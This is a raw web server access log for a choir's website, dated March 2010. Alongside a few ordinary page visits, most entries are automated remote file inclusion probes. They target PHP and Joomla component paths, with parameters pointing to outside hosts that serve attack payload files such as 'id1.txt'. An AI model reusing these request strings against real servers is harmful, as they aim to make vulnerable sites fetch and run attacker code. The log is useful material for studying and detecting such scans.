124.121.188.103 - - [09/Mar/2010:10:19:51 -0800] "GET /xxx/ HTTP/1.0" 200 646 "http://www.google.co.th/search?hl=th&q=parent+directory+xxx&meta=&aq=f&oq=" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)" "www.americanboyschoir.com"
222.237.78.176 - - [09/Mar/2010:10:21:14 -0800] "GET /logs/?mosConfig.absolute.path=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 200 1081 "-" "Mozilla/5.0" "www.americanboyschoir.com"
222.237.78.176 - - [09/Mar/2010:10:21:14 -0800] "GET /logs/access_100130.log/?mosConfig.absolute.path=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
222.237.78.176 - - [09/Mar/2010:10:21:14 -0800] "GET /?mosConfig.absolute.path=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 200 1724 "-" "Mozilla/5.0" "www.americanboyschoir.com"
208.76.111.218 - - [09/Mar/2010:10:21:31 -0800] "GET /logs/access_100109.log//components/com_koesubmit/koesubmit.php?mosConfig_absolute_path=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
124.121.188.103 - - [09/Mar/2010:10:21:42 -0800] "GET /xxx/resourcesgreg/ HTTP/1.0" 200 536 "http://www.americanboyschoir.com/xxx/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)" "www.americanboyschoir.com"
200.93.147.154 - - [09/Mar/2010:10:21:58 -0800] "GET /logs/access_100213.log/index.php?redir=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
222.237.78.176 - - [09/Mar/2010:10:22:32 -0800] "GET /logs/access_100205.log/?mosConfig.absolute.path=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
213.239.219.10 - - [09/Mar/2010:10:22:48 -0800] "GET /logs/access.log//components/com_koesubmit/koesubmit.php?mosConfig_absolute_path=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
124.121.188.103 - - [09/Mar/2010:10:23:10 -0800] "GET /xxx/ HTTP/1.0" 200 646 "http://www.americanboyschoir.com/xxx/resourcesgreg/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)" "www.americanboyschoir.com"
124.121.188.103 - - [09/Mar/2010:10:27:28 -0800] "GET / HTTP/1.0" 200 1708 "http://www.americanboyschoir.com/xxx/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)" "www.americanboyschoir.com"
213.239.219.10 - - [09/Mar/2010:10:30:58 -0800] "GET /admin/classes/TplLoad.php?full_path_to_public_program=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
213.239.219.10 - - [09/Mar/2010:10:30:58 -0800] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
213.239.219.10 - - [09/Mar/2010:10:30:58 -0800] "GET /logs/access_100209.log%20%20//admin/classes/TplLoad.php?full_path_to_public_program=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
124.121.188.103 - - [09/Mar/2010:10:31:15 -0800] "GET /xxxx/ HTTP/1.0" 200 506 "http://www.americanboyschoir.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)" "www.americanboyschoir.com"
213.239.219.10 - - [09/Mar/2010:10:32:00 -0800] "GET /logs/access_100117.log%20%20//admin/classes/TplLoad.php?full_path_to_public_program=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
208.76.111.218 - - [09/Mar/2010:10:32:12 -0800] "GET /logs/access_100117.log%20%20//admin/classes/TplLoad.php?full_path_to_public_program=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
208.76.111.218 - - [09/Mar/2010:10:32:13 -0800] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
208.76.111.218 - - [09/Mar/2010:10:32:13 -0800] "GET /admin/classes/TplLoad.php?full_path_to_public_program=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
208.76.111.218 - - [09/Mar/2010:10:32:21 -0800] "GET /logs/access_091111.log%20%20//admin/classes/TplLoad.php?full_path_to_public_program=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
216.119.103.16 - - [09/Mar/2010:10:33:51 -0800] "GET /logs//administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://kopriusa.org/bbs/gn4/bbs/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
216.119.103.16 - - [09/Mar/2010:10:33:51 -0800] "GET /logs/access_100213.log%20%20//administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://kopriusa.org/bbs/gn4/bbs/id1.txt??? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
216.119.103.16 - - [09/Mar/2010:10:33:54 -0800] "GET /administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://kopriusa.org/bbs/gn4/bbs/id1.txt??? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
201.93.165.28 - - [09/Mar/2010:10:34:17 -0800] "GET /logs///////delete_all.php.orig?option=com_performs&task=rss&Itemid=&mosConfig_absolute_path=http://auctionsworldwide.net//gsales///uploaded/catimgs/id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
201.93.165.28 - - [09/Mar/2010:10:34:17 -0800] "GET //////delete_all.php.orig?option=com_performs&task=rss&Itemid=&mosConfig_absolute_path=http://auctionsworldwide.net//gsales///uploaded/catimgs/id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
201.93.165.28 - - [09/Mar/2010:10:34:17 -0800] "GET /logs/access_100202.log%20%20///////delete_all.php.orig?option=com_performs&task=rss&Itemid=&mosConfig_absolute_path=http://auctionsworldwide.net//gsales///uploaded/catimgs/id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
222.109.127.201 - - [09/Mar/2010:10:34:38 -0800] "GET /logs/access_100116.log//admin/business_inc/saveserver.php?thisdir=http://www.wtsmith.co.uk/media/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.americanboyschoir.com"
222.109.127.201 - - [09/Mar/2010:10:34:38 -0800] "GET /logs/access_100116.log//admin/business_inc/saveserver.php?thisdir=http://www.wtsmith.co.uk/media/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.americanboyschoir.com"
222.109.127.201 - - [09/Mar/2010:10:34:39 -0800] "GET /admin/business_inc/saveserver.php?thisdir=http://www.wtsmith.co.uk/media/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.americanboyschoir.com"
222.109.127.201 - - [09/Mar/2010:10:34:39 -0800] "GET /admin/business_inc/saveserver.php?thisdir=http://www.wtsmith.co.uk/media/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.americanboyschoir.com"
222.109.127.201 - - [09/Mar/2010:10:34:39 -0800] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://www.wtsmith.co.uk/media/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.americanboyschoir.com"
222.109.127.201 - - [09/Mar/2010:10:34:39 -0800] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://www.wtsmith.co.uk/media/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.americanboyschoir.com"
188.130.32.85 - - [09/Mar/2010:10:34:40 -0800] "GET /logs//technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://downloadgogo.com/osCommerce/catalog/pub/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
188.130.32.85 - - [09/Mar/2010:10:34:40 -0800] "GET /technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://downloadgogo.com/osCommerce/catalog/pub/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
188.130.32.85 - - [09/Mar/2010:10:34:41 -0800] "GET /logs/access_091029.log%20%20//technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://downloadgogo.com/osCommerce/catalog/pub/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
222.109.127.201 - - [09/Mar/2010:10:35:03 -0800] "GET /logs/access_100130.log//admin/business_inc/saveserver.php?thisdir=http://www.wtsmith.co.uk/media/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.americanboyschoir.com"
201.93.165.28 - - [09/Mar/2010:10:35:05 -0800] "GET /logs/access_100129.log%20%20///////delete_all.php.orig?option=com_performs&task=rss&Itemid=&mosConfig_absolute_path=http://auctionsworldwide.net//gsales///uploaded/catimgs/id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
188.130.32.85 - - [09/Mar/2010:10:35:16 -0800] "GET /logs/access_100126.log%20%20//technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://downloadgogo.com/osCommerce/catalog/pub/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
213.239.219.10 - - [09/Mar/2010:10:36:52 -0800] "GET /logs/access_100209.log//admin/classes/TplLoad.php?full_path_to_public_program=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
213.239.219.10 - - [09/Mar/2010:10:37:00 -0800] "GET /logs/access_100117.log//admin/classes/TplLoad.php?full_path_to_public_program=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
222.237.78.176 - - [09/Mar/2010:10:38:18 -0800] "GET /logs/access_091229.log%20%20/?mosConfig.absolute.path=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
222.237.78.176 - - [09/Mar/2010:10:38:18 -0800] "GET /?mosConfig.absolute.path=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 200 1724 "-" "Mozilla/5.0" "www.americanboyschoir.com"
222.237.78.176 - - [09/Mar/2010:10:38:18 -0800] "GET /logs/?mosConfig.absolute.path=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 200 1081 "-" "Mozilla/5.0" "www.americanboyschoir.com"
213.239.219.10 - - [09/Mar/2010:10:39:05 -0800] "GET /logs/access.log//admin/classes/TplLoad.php?full_path_to_public_program=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
208.76.111.218 - - [09/Mar/2010:10:39:27 -0800] "GET /logs/access.log//admin/classes/TplLoad.php?full_path_to_public_program=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
193.111.95.42 - - [09/Mar/2010:10:39:43 -0800] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://eventus.org.ru/mambots/ts???? HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.americanboyschoir.com"
193.111.95.42 - - [09/Mar/2010:10:39:43 -0800] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://eventus.org.ru/mambots/ts???? HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.americanboyschoir.com"
61.47.7.71 - - [09/Mar/2010:10:40:46 -0800] "GET /logs//////?_SERVER[DOCUMENT_ROOT]=http://sumanenter.com/id1??? HTTP/1.1" 200 1090 "-" "Mozilla/5.0" "www.americanboyschoir.com"
61.47.7.71 - - [09/Mar/2010:10:40:46 -0800] "GET /logs/access_091111.log//////?_SERVER[DOCUMENT_ROOT]=http://sumanenter.com/id1??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
61.47.7.71 - - [09/Mar/2010:10:40:46 -0800] "GET /////?_SERVER[DOCUMENT_ROOT]=http://sumanenter.com/id1??? HTTP/1.1" 200 1727 "-" "Mozilla/5.0" "www.americanboyschoir.com"
92.48.119.75 - - [09/Mar/2010:10:43:39 -0800] "GET /logs/access_100131.log/errors.php?error=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
92.48.119.75 - - [09/Mar/2010:10:43:39 -0800] "GET /errors.php?error=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
92.48.119.75 - - [09/Mar/2010:10:43:39 -0800] "GET /logs/errors.php?error=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
61.47.7.71 - - [09/Mar/2010:10:44:47 -0800] "GET /logs/access_091029.log//////?_SERVER[DOCUMENT_ROOT]=http://sumanenter.com/id1??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
118.82.114.113 - - [09/Mar/2010:10:46:26 -0800] "GET /index.php?_REQUEST=&_REQUEST[option]=com_frontpage&_REQUEST[Itemid]=1&GLOBALS=&mosConfig.absolute.path=http://www.aqvivo.de/dua?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.americanboyschoir.com"
118.82.114.113 - - [09/Mar/2010:10:46:26 -0800] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=com_frontpage&_REQUEST[Itemid]=1&GLOBALS=&mosConfig.absolute.path=http://www.aqvivo.de/dua?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.americanboyschoir.com"
118.82.114.113 - - [09/Mar/2010:10:46:26 -0800] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=com_frontpage&_REQUEST[Itemid]=1&GLOBALS=&mosConfig.absolute.path=http://www.spread.xx/xx.xx??&u=x HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.americanboyschoir.com"
65.55.115.151 - - [09/Mar/2010:10:46:30 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.americanboyschoir.com"
67.227.136.138 - - [09/Mar/2010:10:48:59 -0800] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
67.227.136.138 - - [09/Mar/2010:10:48:59 -0800] "GET /logs/access_100228.log%20%20/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
67.227.136.138 - - [09/Mar/2010:10:48:59 -0800] "GET /logs/access_100205.log%20%20/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
67.227.136.138 - - [09/Mar/2010:10:48:59 -0800] "GET /logs/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
67.227.136.138 - - [09/Mar/2010:10:50:07 -0800] "GET /logs/access_100228.log%20%20/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
67.227.136.138 - - [09/Mar/2010:10:50:07 -0800] "GET /logs/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
67.227.136.138 - - [09/Mar/2010:10:50:07 -0800] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
67.227.136.138 - - [09/Mar/2010:10:50:08 -0800] "GET /logs/access_100205.log%20%20/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
67.227.136.138 - - [09/Mar/2010:10:50:42 -0800] "GET /logs/access_100228.log%20%20/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
67.227.136.138 - - [09/Mar/2010:10:50:42 -0800] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
67.227.136.138 - - [09/Mar/2010:10:50:42 -0800] "GET /logs/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
67.227.136.138 - - [09/Mar/2010:10:50:43 -0800] "GET /logs/access_100205.log%20%20/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
67.227.136.138 - - [09/Mar/2010:10:50:48 -0800] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
67.227.136.138 - - [09/Mar/2010:10:50:48 -0800] "GET /logs/access_100228.log%20%20/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
67.227.136.138 - - [09/Mar/2010:10:50:48 -0800] "GET /logs/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
67.227.136.138 - - [09/Mar/2010:10:50:48 -0800] "GET /logs/access_100205.log%20%20/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
208.76.111.218 - - [09/Mar/2010:10:54:27 -0800] "GET /logs/errors.php?error=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
208.76.111.218 - - [09/Mar/2010:10:54:28 -0800] "GET /errors.php?error=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
208.97.178.7 - - [09/Mar/2010:11:04:05 -0800] "GET /logs/Components/errors.php?error=http://mensagemwebbr.info/fx29id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
208.97.178.7 - - [09/Mar/2010:11:04:05 -0800] "GET /Components/errors.php?error=http://mensagemwebbr.info/fx29id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
219.240.39.222 - - [09/Mar/2010:11:07:39 -0800] "GET /logs///write_comment_update.php?board_skin_path=http://www.infolitbang.ristek.go.id/template/.fxcom/fxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
219.240.39.222 - - [09/Mar/2010:11:07:39 -0800] "GET /logs/access.log///write_comment_update.php?board_skin_path=http://www.infolitbang.ristek.go.id/template/.fxcom/fxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
219.240.39.222 - - [09/Mar/2010:11:07:39 -0800] "GET //write_comment_update.php?board_skin_path=http://www.infolitbang.ristek.go.id/template/.fxcom/fxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
77.240.113.151 - - [09/Mar/2010:11:08:23 -0800] "GET /errors.php?error=http://www.vinotecnia.es/files/ts???? HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.americanboyschoir.com"
77.240.113.151 - - [09/Mar/2010:11:08:23 -0800] "GET /logs/errors.php?error=http://www.vinotecnia.es/files/ts???? HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.americanboyschoir.com"
208.97.178.7 - - [09/Mar/2010:11:08:38 -0800] "GET /logs/access_100130.log%20%20/Components/errors.php?error=http://mensagemwebbr.info/fx29id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
213.251.170.118 - - [09/Mar/2010:11:09:46 -0800] "GET /logs//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://alienweb-irc.net/gossid?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
213.251.170.118 - - [09/Mar/2010:11:09:46 -0800] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://alienweb-irc.net/gossid?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
213.251.170.118 - - [09/Mar/2010:11:09:46 -0800] "GET /logs/access_091111.log%20%20//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://alienweb-irc.net/gossid?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
213.251.170.118 - - [09/Mar/2010:11:10:06 -0800] "GET /logs/access_100112.log%20%20//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://alienweb-irc.net/gossid?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
67.227.136.138 - - [09/Mar/2010:11:10:16 -0800] "GET /logs//board/bbs//write_comment_update.php?board_skin_path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
67.227.136.138 - - [09/Mar/2010:11:10:16 -0800] "GET /board/bbs//write_comment_update.php?board_skin_path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
67.227.136.138 - - [09/Mar/2010:11:10:16 -0800] "GET /logs/access_100205.log//board/bbs//write_comment_update.php?board_skin_path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
67.227.136.138 - - [09/Mar/2010:11:10:19 -0800] "GET /board/bbs//write_comment_update.php?board_skin_path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
67.227.136.138 - - [09/Mar/2010:11:10:19 -0800] "GET /logs//board/bbs//write_comment_update.php?board_skin_path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
67.227.136.138 - - [09/Mar/2010:11:10:19 -0800] "GET /logs/access_100205.log//board/bbs//write_comment_update.php?board_skin_path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
67.227.136.138 - - [09/Mar/2010:11:10:19 -0800] "GET /logs//board/bbs//write_comment_update.php?board_skin_path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
67.227.136.138 - - [09/Mar/2010:11:10:19 -0800] "GET /board/bbs//write_comment_update.php?board_skin_path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
67.227.136.138 - - [09/Mar/2010:11:10:19 -0800] "GET /logs/access_100205.log%20%20//board/bbs//write_comment_update.php?board_skin_path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
67.227.136.138 - - [09/Mar/2010:11:10:19 -0800] "GET /board/bbs//write_comment_update.php?board_skin_path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
67.227.136.138 - - [09/Mar/2010:11:10:19 -0800] "GET /logs/access_100205.log//board/bbs//write_comment_update.php?board_skin_path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
67.227.136.138 - - [09/Mar/2010:11:10:19 -0800] "GET /logs//board/bbs//write_comment_update.php?board_skin_path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
67.227.136.138 - - [09/Mar/2010:11:10:20 -0800] "GET /board/bbs//write_comment_update.php?board_skin_path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
67.227.136.138 - - [09/Mar/2010:11:10:20 -0800] "GET /logs/access_100205.log//board/bbs//write_comment_update.php?board_skin_path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
67.227.136.138 - - [09/Mar/2010:11:10:20 -0800] "GET /logs//board/bbs//write_comment_update.php?board_skin_path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
67.227.136.138 - - [09/Mar/2010:11:10:21 -0800] "GET /board/bbs//write_comment_update.php?board_skin_path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
